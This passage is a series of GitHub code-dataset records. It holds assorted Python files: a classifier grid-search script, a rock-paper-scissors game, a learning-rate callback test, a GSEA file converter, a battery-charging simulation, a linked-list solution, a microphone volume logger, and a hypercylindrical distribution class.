train_classif) #treinando o algoritmo\n time_train = time.time() - time_train\n print(time_train)\n time_test = time.time() #verificando o tempo decorrido durante os testes\n predicted = randomS.predict(test_news) #testando o algoritmo\n time_test = time.time() - time_test\n print(time_test)\n \n cm = metrics.confusion_matrix(np.asarray(test_classif), predicted, labels = lista)\n \n if('Neutro' not in lista):\n tn, fp, fn, tp = cm.ravel()\n tnt, fnt = ['N/A', 'N/A']\n else: tn, tnt, tp, fn, fnt, fp = get_true_false(cm)\n #relatório de classificação(com precisão, acurácia, f1, recall e etc do teste do algoritmo)\n cr = metrics.classification_report(np.asarray(test_classif), predicted, target_names=lista, zero_division=1, output_dict=True)\n #transferindo os dados do teste para um dicionário\n dic = {\"Algoritmo\" : algoList[j],\n \"Parâmetros testados\" : \"\\n\".join([j for j in sorted(params.keys())]),\n \"Melhores parâmetros\" : \"\\n\".join([\"%s: %r\" % (param_name, randomS.best_params_[param_name]) for param_name in sorted(params.keys())]),\n \"Tipo\" : testes[i],\n \"Acurácia\" : randomS.score(test_news, test_classif),\n \"Duração Treino\" : time_train,\n \"Duração Teste\" : time_test,\n \"FN\" : fn,\n \"FNT\" : fnt, \n \"FP\" : fp, \n \"TN\" : tn, \n \"TNT\" : tnt, \n \"TP\" : tp, \n \"Precisão\" : cr[\"macro avg\"][\"precision\"], \n \"F1\" : cr[\"macro avg\"][\"f1-score\"], \n \"Recall\" : cr[\"macro avg\"][\"recall\"], \n \"N_treino\" : n_treino, \n \"N_teste\" : cr[\"macro avg\"][\"support\"]}\n\n print(f\"A acurácia do teste {testes[i]} utilizando o algoritmo {algoList[j]} é de: \")\n print(dic[\"Acurácia\"])\n print(f\"\\nO treinamento e teste demoraram {time_train + time_test} segundos.\\n\")\n print(\"-------------------------------- Testes padronizados ---------------------\")\n print(\"Best parameters set found on development set:\")\n print()\n print(randomS.best_params_)\n print()\n print(\"Grid scores on development set:\")\n print()\n means = randomS.cv_results_['mean_test_score']\n stds = randomS.cv_results_['std_test_score']\n for mean, std, params in zip(means, stds, randomS.cv_results_['params']):\n print(\"%0.3f (+/-%0.03f) for %r\"\n % (mean, std * 2, params))\n print()\n\n print(\"Detailed classification report:\")\n print()\n print(\"The model is trained on the full development set.\")\n print(\"The scores are computed on the full evaluation set.\")\n print()\n print(classification_report(test_classif, predicted))\n print()\n\n dic_list.append(dic)\n\n#Um dataframe é feito utilizando-se a lista de dicionários\ncmp = pd.DataFrame(dic_list, columns = [\"Algoritmo\", \"Parâmetros testados\", \"Melhores parâmetros\", \"Tipo\", \"Acurácia\", \"Duração Treino\",\"Duração Teste\", \"FN\", \"FNT\", \"FP\", \"TN\", \"TNT\", \"TP\", \"Precisão\", \"F1\", \"Recall\", \"N_treino\", \"N_teste\"])\n\n\n\n","repo_name":"Vitor-Tx/Python-projects","sub_path":"dataScience/improved_grid_search.py","file_name":"improved_grid_search.py","file_ext":"py","file_size_in_byte":7689,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"31872084187","text":"def random_choice():\n random_list = [\"R\", \"P\", \"S\"]\n return random.choice(random_list)\n\n\ndef you_lose():\n print(f\"My choice was '{my_choice}', you lose!\")\n print(\"Lets play one more time\")\n\n\ndef you_win():\n print(f\"My choice was '{my_choice}', you win!\")\n print(\"Congratulations!!!\")\n print(\"Lets play one more time\")\n\n\ndef draw():\n print(f\"My choice was '{my_choice}' too! No Winner! \")\n print(\"Lets play one more time\")\n\n\nprint(\"Lets play Rock Paper Scissors!\")\nwhile True:\n your_choice = input(\"Chose one: Rock, Paper or Scissors? R/P/S: \").upper()\n my_choice = random_choice()\n if your_choice == my_choice:\n draw()\n elif your_choice == \"R\":\n if my_choice == \"P\":\n you_lose()\n elif my_choice == \"S\":\n you_win()\n elif your_choice == \"P\":\n if my_choice == \"S\":\n you_lose()\n elif my_choice == \"R\":\n you_win()\n elif your_choice == \"S\":\n if my_choice == \"R\":\n you_lose()\n elif my_choice == \"P\":\n you_win()\n else:\n print(\"Please type only 'R', 'P' or 'S'\")\n print(50 * \"*\")","repo_name":"python1818/python_principles","sub_path":"practice_python/04_Rock Paper Scissors2.py","file_name":"04_Rock Paper Scissors2.py","file_ext":"py","file_size_in_byte":1143,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"15348858651","text":"import math\n\nimport pytest\nimport tensorflow as tf\nimport numpy as np\n\nfrom tavolo.learning import CyclicLearningRateCallback\n\n\ndef test_logic():\n \"\"\" Test logic on known input \"\"\"\n\n # -------- TRIANGULAR --------\n\n # Input\n input_2d = np.random.normal(size=(1000, 20))\n labels = np.random.randint(low=0, high=2, size=1000)\n\n # Create model\n model = tf.keras.Sequential([tf.keras.layers.Input(shape=(20,)),\n tf.keras.layers.Dense(10, activation=tf.nn.relu),\n tf.keras.layers.Dense(1, activation=tf.nn.sigmoid)])\n model.compile(optimizer=tf.keras.optimizers.SGD(), loss='binary_crossentropy')\n\n # Create callback\n clr = CyclicLearningRateCallback()\n expected_lr_values = list(np.linspace(0.001, 0.006, 2000))\n expected_lr_values = expected_lr_values + expected_lr_values[::-1] # Triangle\n\n # Run model\n model.fit(input_2d, labels, batch_size=10, epochs=5, callbacks=[clr], verbose=0)\n\n assert all(math.isclose(a, b, rel_tol=0.001) for a, b in zip(clr.history['lr'], expected_lr_values))\n\n # -------- TRIANGULAR2 --------\n\n # Create model\n model = tf.keras.Sequential([tf.keras.layers.Input(shape=(20,)),\n tf.keras.layers.Dense(10, activation=tf.nn.relu),\n tf.keras.layers.Dense(1, activation=tf.nn.sigmoid)])\n model.compile(optimizer=tf.keras.optimizers.SGD(), loss='binary_crossentropy')\n\n clr = CyclicLearningRateCallback(scale_scheme='triangular2')\n\n model.fit(input_2d, labels, batch_size=10, epochs=5, callbacks=[clr], verbose=0)\n\n # -------- EXPONENT RANGE --------\n\n # Create model\n model = tf.keras.Sequential([tf.keras.layers.Input(shape=(20,)),\n tf.keras.layers.Dense(10, activation=tf.nn.relu),\n tf.keras.layers.Dense(1, activation=tf.nn.sigmoid)])\n model.compile(optimizer=tf.keras.optimizers.SGD(), loss='binary_crossentropy')\n\n clr = CyclicLearningRateCallback(scale_scheme='exp_range')\n\n model.fit(input_2d, labels, batch_size=10, epochs=5, callbacks=[clr], verbose=0)\n\n # -------- CUSTOM SCALING --------\n\n # Create model\n model = tf.keras.Sequential([tf.keras.layers.Input(shape=(20,)),\n tf.keras.layers.Dense(10, activation=tf.nn.relu),\n tf.keras.layers.Dense(1, activation=tf.nn.sigmoid)])\n model.compile(optimizer=tf.keras.optimizers.SGD(), loss='binary_crossentropy')\n\n scale_fn = lambda x: 0.5 * (1 + np.sin(x * np.pi / 2.))\n clr = CyclicLearningRateCallback(scale_mode='cycle', scale_fn=scale_fn)\n\n model.fit(input_2d, labels, batch_size=10, epochs=5, callbacks=[clr], verbose=0)\n\n\ndef test_exceptions():\n \"\"\" Text for expected exceptions \"\"\"\n\n # Sequence length lower than 1\n with pytest.raises(ValueError) as excinfo:\n CyclicLearningRateCallback(scale_scheme='wrong_value')\n\n assert 'is not a supported scale scheme' in str(excinfo.value)\n","repo_name":"eliorc/tavolo","sub_path":"tests/learning/cyclic_learning_rate_callback_test.py","file_name":"cyclic_learning_rate_callback_test.py","file_ext":"py","file_size_in_byte":3041,"program_lang":"python","lang":"en","doc_type":"code","stars":50,"dataset":"github-code","pt":"48"} +{"seq_id":"24543744020","text":"class StatisticsClassification:\n \n def __init__(\n self,\n Accuracy = 0,\n BalancedAccuracy = 0,\n Precision = 0,\n Recall = 0,\n F1Score = 0,\n HammingLoss = 0,\n CrossEntropyLoss = 0,\n ConfusionMatrix = []\n ) -> None:\n \n self.Accuracy = str(float(Accuracy))\n self.BalancedAccuracy = str(float(BalancedAccuracy))\n self.Precision = str(float(Precision))\n self.Recall = str(float(Recall))\n self.F1Score = str(float(F1Score))\n self.HammingLoss = str(float(HammingLoss))\n self.CrossEntropyLoss = str(float(CrossEntropyLoss))\n self.ConfusionMatrix = [[int(i) for i in row] for row in ConfusionMatrix]\n \n ","repo_name":"android172/Igrannonica","sub_path":"src/ml/Models/StatisticsClassification.py","file_name":"StatisticsClassification.py","file_ext":"py","file_size_in_byte":817,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"10364614138","text":"# Generally you shouldn't use filtered data for GSEA, so the gene_list file should be all the genes in the GTF file\n# Make this file from the TPM file with the commands:\n# tail -n +2 all_samples_TPM.txt > all_samples_TPM_no_header.txt\n# awk '{print $1}' all_samples_TPM_no_header.txt > complete_gene_list.txt\n\n# Syntax: python GSEA_file_creation.py gene_list TPM_file outfile\n\nimport sys\n\n# Check if files are there\n\nif len(sys.argv) < 3:\n print(\"Not enough files, rerun program\")\n sys.exit()\n\n# Take in filenames from command line\n\nfile1 = sys.argv[1]\nfile2 = sys.argv[2]\noutfile = sys.argv[3]\n\ndata1 = []\ndata2 = []\n\n# Read in gene_list \n\nwith open(file1) as f:\n for line in f:\n split_cols = line.split('\\n')\n data1.append(split_cols[0])\n\n# Process TPM file\n\ni = 0\n\nwith open(file2) as f:\n for line in f:\n if i > 0:\n split_cols = line.split(\"\\n\")\n split_cols = split_cols[0].split(\"\\t\")\n data2.append(split_cols)\n else:\n header = line.split('\\n')\n header = header[0].split(\"\\t\")\n i = i + 1\n\n# Find matches and record indeces of matches\n\nTPM_gene_list = list(zip(*data2))[0]\ngene_row = []\n\nfor i in range(len(data1)):\n gene_row.append(TPM_gene_list.index(data1[i]))\n\n# Make GCT file\n\nwith open(outfile, 'wt') as f:\n f.write('#1.2\\n')\n f.write(str(len(data1)))\n f.write('\\t')\n f.write(str(len(header)))\n f.write('\\n')\n f.write('Gene\\tDescription\\t')\n f.write('\\t'.join(header[:]))\n f.write('\\n')\n for i in range(len(gene_row)):\n f.write(TPM_gene_list[gene_row[i]].upper())\n f.write('\\t')\n f.write(TPM_gene_list[gene_row[i]])\n f.write('\\t')\n f.write('\\t'.join(data2[gene_row[i]][1:]))\n f.write('\\n')\n\n","repo_name":"lynn-sanford/RNASeq_processing_scripts","sub_path":"08_downstream/GSEA/GSEA_file_creation.py","file_name":"GSEA_file_creation.py","file_ext":"py","file_size_in_byte":1674,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"41343192200","text":"from copy import deepcopy\nimport os\nfrom pathlib import Path\n\nimport numpy as np\nimport pandas as pd\nfrom tqdm import tqdm\n\nfrom battery_controller import BatteryContoller\nfrom battery import Battery\n\n\nclass Simulation(object):\n \"\"\" Handles running a simulation.\n \"\"\"\n def __init__(self,\n data,\n battery,\n site_id):\n \"\"\" Creates initial simulation state based on data passed in.\n\n :param data: contains all the time series needed over the considered period\n :param battery: is a battery instantiated with 0 charge and the relevant properties\n :param site_id: the id for the site (building)\n \"\"\"\n\n self.data = data\n\n # building initialization\n self.actual_previous_load = self.data.actual_consumption.values[0]\n self.actual_previous_pv = self.data.actual_pv.values[0]\n\n # align actual as the following, not the previous 15 minutes to\n # simplify simulation\n self.data.loc[:, 'actual_consumption'] = self.data.actual_consumption.shift(-1)\n self.data.loc[:, 'actual_pv'] = self.data.actual_pv.shift(-1)\n\n self.site_id = site_id\n self.load_columns = data.columns.str.startswith('load_')\n self.pv_columns = data.columns.str.startswith('pv_')\n self.price_sell_columns = data.columns.str.startswith('price_sell_')\n self.price_buy_columns = data.columns.str.startswith('price_buy_')\n\n # initialize money at 0.0\n self.money_spent = 0.0\n self.money_spent_without_battery = 0.0\n\n # battery initialization\n self.battery = battery\n\n def run(self):\n \"\"\" Executes the simulation by iterating through each of the data points\n It returns both the electricity cost spent using the battery and the\n cost that would have been incurred with no battery.\n \"\"\"\n battery_controller = BatteryContoller()\n\n for current_time, timestep in tqdm(self.data.iterrows(), total=self.data.shape[0], desc=' > > > > timesteps\\t'):\n # can't calculate results without actual, so skip (should only be last row)\n if pd.notnull(timestep.actual_consumption):\n self.simulate_timestep(battery_controller, current_time, timestep)\n\n return self.money_spent, self.money_spent_without_battery\n\n def simulate_timestep(self, battery_controller, current_time, timestep):\n \"\"\" Executes a single timestep using `battery_controller` to get\n a proposed state of charge and then calculating the cost of\n making those changes.\n\n :param battery_controller: The battery controller\n :param current_time: the timestamp of the current time step\n :param timestep: the data available at this timestep\n \"\"\"\n # get proposed state of charge from the battery controller\n proposed_state_of_charge = battery_controller.propose_state_of_charge(\n self.site_id,\n current_time,\n deepcopy(self.battery),\n self.actual_previous_load,\n self.actual_previous_pv,\n timestep[self.price_buy_columns],\n timestep[self.price_sell_columns],\n timestep[self.load_columns],\n timestep[self.pv_columns]\n )\n\n # get energy required to achieve the proposed state of charge\n grid_energy, battery_energy_change = self.simulate_battery_charge(self.battery.current_charge,\n proposed_state_of_charge,\n timestep.actual_consumption,\n timestep.actual_pv)\n\n grid_energy_without_battery = timestep.actual_consumption - timestep.actual_pv\n\n # buy or sell energy depending on needs\n price = timestep.price_buy_00 if grid_energy >= 0 else timestep.price_sell_00\n price_without_battery = timestep.price_buy_00 if grid_energy_without_battery >= 0 else timestep.price_sell_00\n\n # calculate spending based on price per kWh and energy per Wh\n self.money_spent += grid_energy * (price / 1000.)\n self.money_spent_without_battery += grid_energy_without_battery * (price_without_battery / 1000.)\n\n # update current state of charge\n self.battery.current_charge += battery_energy_change / self.battery.capacity\n self.actual_previous_load = timestep.actual_consumption\n self.actual_previous_pv = timestep.actual_pv\n\n def simulate_battery_charge(self, initial_state_of_charge, proposed_state_of_charge, actual_consumption, actual_pv):\n \"\"\" Charges or discharges the battery based on what is desired and\n available energy from grid and pv.\n\n :param initial_state_of_charge: the current state of the battery\n :param proposed_state_of_charge: the proposed state for the battery\n :param actual_consumption: the actual energy consumed by the building\n :param actual_pv: the actual pv energy produced and available to the building\n \"\"\"\n # charge is bounded by what is feasible\n proposed_state_of_charge = np.clip(proposed_state_of_charge, 0.0, 1.0)\n\n # calculate proposed energy change in the battery\n target_energy_change = (proposed_state_of_charge - initial_state_of_charge) * self.battery.capacity\n\n # efficiency can be different whether we intend to charge or discharge\n if target_energy_change >= 0:\n efficiency = self.battery.charging_efficiency\n target_charging_power = target_energy_change / ((15. / 60.) * efficiency)\n else:\n efficiency = self.battery.discharging_efficiency\n target_charging_power = target_energy_change * efficiency / (15. / 60.)\n\n # actual power is bounded by the properties of the battery\n actual_charging_power = np.clip(target_charging_power,\n self.battery.discharging_power_limit,\n self.battery.charging_power_limit)\n\n # actual energy change is based on the actual power possible and the efficiency\n if actual_charging_power >= 0:\n actual_energy_change = actual_charging_power * (15. / 60.) * efficiency\n else:\n actual_energy_change = actual_charging_power * (15. / 60.) / efficiency\n\n # what we need from the grid = (the power put into the battery + the consumption) - what is available from pv\n grid_energy = (actual_charging_power * (15. / 60.) + actual_consumption) - actual_pv\n\n # if positive, we are buying from the grid; if negative, we are selling\n return grid_energy, actual_energy_change\n\n\nif __name__ == '__main__':\n simulation_dir = (Path(__file__)/os.pardir/os.pardir).resolve()\n data_dir = simulation_dir/'data'\n output_dir = simulation_dir/'output'\n\n # load available metadata to determine the runs\n metadata_path = data_dir/'metadata.csv'\n metadata = pd.read_csv(metadata_path, index_col=0)\n\n # store results of each run\n results = []\n\n # # execute two runs with each battery for every row in the metadata file:\n for site_id, parameters in tqdm(metadata.iterrows(), desc='sites\\t\\t\\t', total=metadata.shape[0]):\n site_data_path = data_dir/\"submit\"/f\"{site_id}.csv\"\n\n if site_data_path.exists():\n site_data = pd.read_csv(site_data_path,\n parse_dates=['timestamp'],\n index_col='timestamp')\n\n for batt_id in tqdm([1, 2], desc=' > batteries \\t\\t'):\n # create the battery for this run\n # (Note: Quantities in kW are converted to watts here)\n batt = Battery(capacity=parameters[f\"Battery_{batt_id}_Capacity\"] * 1000,\n charging_power_limit=parameters[f\"Battery_{batt_id}_Power\"] * 1000,\n discharging_power_limit=-parameters[f\"Battery_{batt_id}_Power\"] * 1000,\n charging_efficiency=parameters[f\"Battery_{batt_id}_Charge_Efficiency\"],\n discharging_efficiency=parameters[f\"Battery_{batt_id}_Discharge_Efficiency\"])\n\n # execute the simulation for each simulation period in the data\n n_periods = site_data.period_id.nunique()\n for g_id, g_df in tqdm(site_data.groupby('period_id'), total=n_periods, desc=' > > periods\\t\\t'):\n # reset battery to no charge before simulation\n batt.current_charge = 0\n\n sim = Simulation(g_df, batt, site_id)\n money_spent, money_no_batt = sim.run()\n\n # store the results\n results.append({\n 'run_id': f\"{site_id}_{batt_id}_{g_id}\",\n 'site_id': site_id,\n 'battery_id': batt_id,\n 'period_id': g_id,\n 'money_spent': money_spent,\n 'money_no_batt': money_no_batt,\n 'score': (money_spent - money_no_batt) / np.abs(money_no_batt),\n })\n\n # write all results out to a file\n results_df = pd.DataFrame(results).set_index('run_id')\n results_df = results_df[['site_id', 'battery_id', 'period_id', 'money_spent', 'money_no_batt', 'score']]\n results_df.to_csv(output_dir/'results.csv')\n","repo_name":"drivendataorg/power-laws-optimization","sub_path":"simulation_engine/simulate/simulate.py","file_name":"simulate.py","file_ext":"py","file_size_in_byte":9616,"program_lang":"python","lang":"en","doc_type":"code","stars":27,"dataset":"github-code","pt":"48"} +{"seq_id":"16556060712","text":"# Definition for singly-linked list.\n# class ListNode(object):\n# def __init__(self, val=0, next=None):\n# self.val = val\n# self.next = next\nclass Solution(object):\n def reverseBetween(self, head, left, right):\n \"\"\"\n :type head: ListNode\n :type left: int\n :type right: int\n :rtype: ListNode\n \"\"\"\n # 정렬한 연결리스트가 할당될 변수\n result = dummy = ListNode()\n # 범위 내의 연결리스트를 역순으로 정렬하여 할당할 변수\n rev = reverse = ListNode()\n # 범위에 해당하는 노드인지 확인하기 위한 변수\n count = 1\n # 연결리스트 끝까지 반복\n while head:\n # 순번이 범위 안일 경우\n if count in range(left, right+1):\n # 범위의 시작점일 경우 val만 변경(역순 연결리스트의 끝이 0이 되는걸 방지하기 위해)\n if count == left:\n rev.val = head.val\n # 범위의 시작점이 아닐 경우 rev를 다음값으로 지정하고 head의 값을 새로운 노드의 val로 넣어 rev에 할당(역순 정렬)\n else:\n rev = ListNode(head.val, rev)\n # 위 조건을 거친 후 범위의 마지막일 경우 멈춰있는 dummy연결리스트의 다음 포인터를 역순 연결리스트의 시작점으로 지정 후 \n # dummy를 역순 연결리스트의 끝으로 이동 \n if count == right:\n dummy.next = rev\n dummy = reverse\n # 순번이 범위 밖일 경우 dummy연결리스트의 다음포인터로 현재 head를 지정 후 다음포인터로 이동\n else:\n dummy.next = head\n dummy = dummy.next\n # 연결리스트를 다음 포인터로 이동\n head = head.next\n count += 1\n # 시작점의 val은 0이고 정답은 다음포인터부터 시작이기에 다음 포인터를 반환\n return result.next","repo_name":"junhong625/MOCOCO","sub_path":"[2주차] 연결리스트(LinkdedList)/[LeetCode 92번] Reverse Linked List 2/안준홍_역순 연결리스트 따로 합치기.py","file_name":"안준홍_역순 연결리스트 따로 합치기.py","file_ext":"py","file_size_in_byte":2103,"program_lang":"python","lang":"ko","doc_type":"code","stars":3,"dataset":"github-code","pt":"48"} +{"seq_id":"14283271641","text":"# Author Z\nimport tornado.web\nfrom controllers import home\n\nsettings = {\n \"template_path\":\"views\",\n \"static_path\":\"statics\",\n 'static_url_prefix':'/statics/',\n}\n\napplication = tornado.web.Application([\n (r\"/index/(?P\\d*)\",home.IndexHandler),\n],**settings)\n\nif __name__ == '__main__':\n application.listen(8005)\n tornado.ioloop.IOLoop.instance().start()","repo_name":"cosmosy-z/python-fenye","sub_path":"start.py","file_name":"start.py","file_ext":"py","file_size_in_byte":375,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"6638071202","text":"#!/usr/bin/python\n\"\"\"\nThe script opens an ALSA pcm for sound capture. Set various attributes\nof the capture, and reads in a loop, then prints the volume.\n\nTo test it out, run it and shout at your microphone.\n\nRequired: libasound2-dev\nRPi:\n# Keep snd-usb-audio from beeing loaded as first soundcard\n#options snd-usb-audio index=-2\n\nSee the associated article:\n http://ampledata.org/blue_angels_flyover_detection_using_splunk.html\n\nSource: https://github.com/ampledata/sounding\n\"\"\"\n\n__author__ = 'Greg Albrecht '\n__copyright__ = 'Copyright 2015 Greg Albrecht'\n__license__ = 'Apache License, Version 2.0'\n\n\nimport alsaaudio\n\nimport audioop\nimport math\nimport os\nimport socket\nimport sys\nimport time\n\n\nCHANNELS = 1 # Mono\nRATE = 8000 # 8 kHz\nFORMAT = alsaaudio.PCM_FORMAT_S16_LE # 16bit Little Endian\n\n# http://stackoverflow.com/questions/2445756/how-can-i-calculate-audio-db-level\nMAX_AMPLITUDE = 32767\n\n# The period size controls the internal number of frames per period.\n# The significance of this parameter is documented in the ALSA api.\n# For our purposes, it is suficcient to know that reads from the device\n# will return this many frames. Each frame being 2 bytes long.\n# This means that the reads below will return either 320 bytes of data\n# or 0 bytes of data. The latter is possible because we are in nonblocking\n# mode.\nPERIODSIZE = 160\n\n# Seconds to sleep between samples\nSLEEP = .01\n\nCOLLECTD_HOST = os.environ.get('COLLECTD_HOST')\nCOLLECTD_PORT = os.environ.get('COLLECTD_PORT', 2003)\n\n\ndef collect_metric(name, value, timestamp, prefix='sounding'):\n metric_name = '.'.join([prefix, name])\n sock = socket.socket()\n sock.connect((COLLECTD_HOST, COLLECTD_PORT) )\n sock.send(\"%s %d %d\\n\" % (metric_name, value, timestamp))\n sock.close()\n\n\ndef setup_audio():\n inp = alsaaudio.PCM(alsaaudio.PCM_CAPTURE, alsaaudio.PCM_NONBLOCK)\n inp.setchannels(CHANNELS)\n inp.setrate(RATE)\n inp.setformat(FORMAT)\n inp.setperiodsize(PERIODSIZE)\n return inp\n\n\ndef main():\n audio = setup_audio()\n\n while 1:\n data_len, data = audio.read()\n if data_len:\n try:\n audio_max = audioop.max(data, 2)\n audio_rms = audioop.rms(data, 2)\n amplitude = float(audio_max) / float(MAX_AMPLITUDE)\n dBg = 20 * math.log10(amplitude)\n timestamp = time.time()\n collect_metric('audio_rms', audio_rms, timestamp)\n collect_metric('audio_max', audio_max, timestamp)\n collect_metric('amplitude', amplitude, timestamp)\n collect_metric('dBg', dBg, timestamp)\n time.sleep(SLEEP)\n except audioop.error:\n pass\n except ValueError:\n pass\n\nif __name__ == '__main__':\n sys.exit(main())\n","repo_name":"ampledata/sounding","sub_path":"sounding.py","file_name":"sounding.py","file_ext":"py","file_size_in_byte":2833,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"24034710005","text":"from abc import abstractmethod\n\nimport numpy as np\nimport scipy.integrate\nimport scipy.optimize\nfrom beartype import beartype\nfrom scipy.integrate import nquad\n\nfrom ..hypertorus.custom_hypertoroidal_distribution import (\n CustomHypertoroidalDistribution,\n)\nfrom ..nonperiodic.custom_linear_distribution import CustomLinearDistribution\nfrom .abstract_lin_periodic_cart_prod_distribution import (\n AbstractLinPeriodicCartProdDistribution,\n)\n\n\nclass AbstractHypercylindricalDistribution(AbstractLinPeriodicCartProdDistribution):\n def __init__(\n self, bound_dim: int | np.int32 | np.int64, lin_dim: int | np.int32 | np.int64\n ):\n AbstractLinPeriodicCartProdDistribution.__init__(self, bound_dim, lin_dim)\n\n @abstractmethod\n def pdf(self, xs):\n pass\n\n def integrate(self, integration_boundaries=None):\n return self.integrate_numerically(integration_boundaries)\n\n def integrate_numerically(self, integration_boundaries=None):\n if integration_boundaries is None:\n integration_boundaries = self.get_reasonable_integration_boundaries()\n\n def f(*args):\n return self.pdf(np.array(args))\n\n integration_result = nquad(f, integration_boundaries)[0]\n\n return integration_result\n\n @beartype\n def get_reasonable_integration_boundaries(self, scalingFactor=10) -> np.ndarray:\n \"\"\"\n Returns reasonable integration boundaries for the specific distribution\n based on the mode and covariance.\n \"\"\"\n left = np.empty((self.bound_dim + self.lin_dim, 1))\n right = np.empty((self.bound_dim + self.lin_dim, 1))\n P = self.linear_covariance()\n m = self.mode()\n\n for i in range(self.bound_dim, self.bound_dim + self.lin_dim):\n left[i] = m[i] - scalingFactor * np.sqrt(\n P[i - self.bound_dim, i - self.bound_dim]\n )\n right[i] = m[i] + scalingFactor * np.sqrt(\n P[i - self.bound_dim, i - self.bound_dim]\n )\n\n return np.vstack((left, right))\n\n def mode(self):\n \"\"\"Find the mode of the distribution by calling mode_numerical.\"\"\"\n return self.mode_numerical()\n\n def linear_covariance(self, approximate_mean=None):\n \"\"\"\n Calculates the linear covariance, or calls linear_covariance_numerical\n if a non-numerical solution doesn't exist.\n\n Parameters:\n - approximate_mean : ndarray, optional\n The approximate mean to be used. If None, uses NaNs to flag for calculation.\n\n Returns:\n - C : ndarray\n The linear covariance.\n \"\"\"\n if approximate_mean is None:\n approximate_mean = np.full((self.lin_dim,), np.nan)\n\n assert approximate_mean.shape[0] == self.lin_dim\n\n return self.linear_covariance_numerical(approximate_mean)\n\n def linear_covariance_numerical(self, approximate_mean=None):\n \"\"\"\n Numerically calculates the linear covariance.\n\n Parameters:\n - approximate_mean : ndarray, optional\n The approximate mean to be used. If None, calculates the mean.\n\n Returns:\n - C : ndarray\n The linear covariance.\n \"\"\"\n if approximate_mean is None or np.any(np.isnan(approximate_mean)):\n approximate_mean = self.linear_mean_numerical()\n\n if self.bound_dim == 1 and self.lin_dim == 1:\n C, _ = nquad(\n lambda x, y: (y - approximate_mean) ** 2 * self.pdf([x, y]),\n [[0, 2 * np.pi], [-np.inf, np.inf]],\n )\n elif self.bound_dim == 2 and self.lin_dim == 1:\n C, _ = nquad(\n lambda x, y, z: (z - approximate_mean) ** 2 * self.pdf([x, y, z]),\n [[0, 2 * np.pi], [0, 2 * np.pi], [-np.inf, np.inf]],\n )\n elif self.bound_dim == 1 and self.lin_dim == 2:\n C = np.empty((2, 2))\n C[0, 0], _ = nquad(\n lambda x, y, z: (y - approximate_mean[0]) ** 2 * self.pdf([x, y, z]),\n [[0, 2 * np.pi], [-np.inf, np.inf], [-np.inf, np.inf]],\n )\n C[0, 1], _ = nquad(\n lambda x, y, z: (y - approximate_mean[0])\n * (z - approximate_mean[1])\n * self.pdf([x, y, z]),\n [[0, 2 * np.pi], [-np.inf, np.inf], [-np.inf, np.inf]],\n )\n C[1, 0] = C[0, 1]\n C[1, 1], _ = nquad(\n lambda x, y, z: (z - approximate_mean[1]) ** 2 * self.pdf([x, y, z]),\n [[0, 2 * np.pi], [-np.inf, np.inf], [-np.inf, np.inf]],\n )\n else:\n raise ValueError(\"Cannot determine linear covariance for this dimension.\")\n\n return C\n\n def condition_on_linear(self, input_lin, normalize=True):\n \"\"\"\n Condition on linear.\n\n Parameters:\n lin_input : ndarray\n Input array.\n normalize : bool, optional\n If True (default), normalizes the distribution.\n\n Returns:\n dist : CustomHypertoroidalDistribution\n The distribution after conditioning.\n \"\"\"\n assert (\n np.size(input_lin) == self.lin_dim and np.ndim(input_lin) <= 1\n ), \"Input should be of size (lin_dim,).\"\n\n def f_cond_unnorm(x, input_lin=input_lin):\n n_inputs = np.size(x) // x.shape[-1] if np.ndim(x) > 1 else np.size(x)\n input_repeated = np.tile(input_lin, (n_inputs, 1))\n return self.pdf(np.column_stack((x, input_repeated)))\n\n dist = CustomHypertoroidalDistribution(f_cond_unnorm, self.bound_dim)\n\n if normalize: # Conditional need not be normalized\n dist = dist.normalize()\n\n return dist\n\n def condition_on_periodic(self, input_periodic, normalize=True):\n \"\"\"\n Conditions the distribution on periodic variables\n\n Arguments:\n input_periodic: ndarray\n Input data, assumed to have shape (self.bound_dim,)\n normalize: bool\n If True, normalizes the distribution\n\n Returns:\n dist: CustomLinearDistribution\n CustomLinearDistribution instance\n \"\"\"\n assert (\n np.size(input_periodic) == self.bound_dim and np.ndim(input_periodic) <= 1\n ), \"Input should be of size (lin_dim,).\"\n\n input_periodic = np.mod(input_periodic, 2 * np.pi)\n\n def f_cond_unnorm(x, input_periodic=input_periodic):\n n_inputs = np.size(x) // x.shape[-1] if np.ndim(x) > 1 else np.size(x)\n input_repeated = np.tile(input_periodic, (n_inputs, 1))\n return self.pdf(np.column_stack((input_repeated, x)))\n\n dist = CustomLinearDistribution(f_cond_unnorm, self.lin_dim)\n\n if normalize: # Conditional may not be normalized\n dist = dist.normalize()\n\n return dist\n\n def linear_mean_numerical(self):\n # Define the integrands for the mean calculation\n if self.lin_dim == 1 and self.bound_dim == 1:\n mu = scipy.integrate.nquad(\n lambda x, y: (y * self.pdf([x, y]))[0],\n [[0, 2 * np.pi], [-np.inf, np.inf]],\n )[0]\n elif self.bound_dim == 2 and self.lin_dim == 1:\n mu = scipy.integrate.nquad(\n lambda x, y, z: (z * self.pdf([x, y, z]))[0],\n [[0, 2 * np.pi], [0, 2 * np.pi], [-np.inf, np.inf]],\n )[0]\n elif self.bound_dim == 1 and self.lin_dim == 2:\n mu = np.empty(2)\n mu[0] = scipy.integrate.nquad(\n lambda x, y, z: (y * self.pdf([x, y, z]))[0],\n [[0, 2 * np.pi], [-np.inf, np.inf], [-np.inf, np.inf]],\n )[0]\n mu[1] = scipy.integrate.nquad(\n lambda x, y, z: (z * self.pdf([x, y, z]))[0],\n [[0, 2 * np.pi], [-np.inf, np.inf], [-np.inf, np.inf]],\n )[0]\n else:\n raise ValueError(\"Cannot determine linear mean for this dimension.\")\n\n return mu\n\n def mode_numerical(self, starting_point=None):\n \"\"\"\n Find the mode of the distribution numerically.\n\n Parameters:\n starting_point : ndarray, optional\n The starting point for the optimization.\n If None, uses [pi * ones(self.bound_dim); zeros(self.lin_dim)]\n\n Returns:\n m : ndarray\n The mode of the distribution.\n \"\"\"\n if starting_point is None:\n starting_point = np.concatenate(\n [np.pi * np.ones(self.bound_dim), 